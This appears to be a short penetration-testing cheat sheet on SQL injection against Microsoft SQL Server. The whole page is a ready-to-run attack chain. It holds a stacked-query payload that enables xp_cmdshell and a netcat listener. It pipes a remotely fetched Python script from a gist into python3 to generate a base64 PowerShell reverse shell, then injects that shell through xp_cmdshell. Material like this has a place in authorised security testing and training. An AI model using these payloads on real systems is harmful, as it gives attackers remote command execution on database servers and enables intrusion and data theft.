SQL injection
Identify the SQLi
Identify the Underlying system


Example
MSSQL
Last updated


Last updated
# Payload
1'; EXEC sp_configure 'Show Advanced Options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; -- # Start listener
sudo rlwrap nc -lnvp 443
# Make powershell base64 reverse shell.
curl -s https://gist.githubusercontent.com/tothi/ab288fb523a4b32b51a53e542d40fe58/raw/40ade3fb5e3665b82310c08d36597123c2e75ab4/mkpsrevshell.py | python3 - $IP_KALI 443 | xclip -selection clipboard
# run below command for shell.
1'; EXEC xp_cmdshell '<base64Code>' --